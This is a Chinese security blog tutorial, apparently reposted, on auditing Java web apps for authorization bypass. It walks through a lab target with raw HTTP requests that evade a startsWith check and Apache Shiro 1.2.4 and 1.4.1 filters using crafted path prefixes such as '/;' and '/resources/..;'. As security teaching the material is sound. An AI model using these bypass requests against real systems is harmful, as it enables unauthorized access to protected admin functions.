JAVA代码审计之权限绕过

admin

135711
文章

111
评论

2025年3月16日00:09:30评论1 views字数 1470阅读4分54秒阅读模式

声明：本文仅用于网络安全相关知识分享，环境为本机靶场，请严格遵守网络安全相关法律法规。

未经授权利用本文相关技术从事违法活动的，一切后果由违法人自行承担！Jie安全公众号及作者不承担任何法律责任。

1、getRequestURI、startsWith

用了getRequestURI来接收url，该方法本来就不安全，此处配合startsWith导致权限绕过。

以下代码大概意思是：如果请求链接以(/admin开头)且(不为/admin/login开头)且(null == user相当于没登陆)就跳转至/admin/login

可以在/admin前面尝试加个/，最好用两个数据包尝试，一个get、一个post

构造get请求

GET /admin/category HTTP/1.1Host: 192.168.0.105User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

跳转登录页

在/admin/category前面加/，报错，说明可能绕过了，但是不知道什么原因报错，可能和上面代码有关

再构造post请求尝试

POST /admin/category/save HTTP/1.1Host: 192.168.0.105Accept: application/json, text/javascript, */*; q=0.01Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 14mid=&cname=999

跳转登录页

在/admin/category/save前面加/，成功

再次发送数据包，提示保存失败，可能之前已经保存成功了

去数据库里查看下，权限绕过成功

2、Shiro1.2.4权限绕过

pom.xml中，shiro版本为1.2.4

先构造接口

GET /admin/user/list?pageNumber=1 HTTP/1.1Host: 192.168.0.105User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

跳转登录

直接尝试在接口前面加/;，绕过

3、Shiro1.4.1权限绕过

找到放行代码，anon是放行的意思

找到anonUrls

先构造接口

GET /user/loadAllUser?page=1&limit=100 HTTP/1.1Host: 192.168.0.105:8080Connection: close

在前面加/resources/..;，绕过成功

关于shiro权限绕过可以参考：https://www.cnblogs.com/nice0e3/p/16248252.html

有疑问可联系我

原文始发于微信公众号（实战安全研究）：JAVA代码审计之权限绕过

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

JAVA代码审计之权限绕过

代码审计之文件上传

审计分析 | 彩虹易支付系统及绕过360检测小技巧

审计分析 | 彩虹易支付系统及绕过360检测小技巧

php代码审计-初学者北公子

JAVA代审之shishuocms

【JAVA安全】JNDI漏洞分析

审计分析 | 某开源OA 前台无条件注入(1DAY)

代码审计 | 某系统存在文件上传漏洞

Java安全-CC6链

JAVA 代码审计第一课：环境搭建与SQL 注入漏洞

发表评论

在线咨询

微信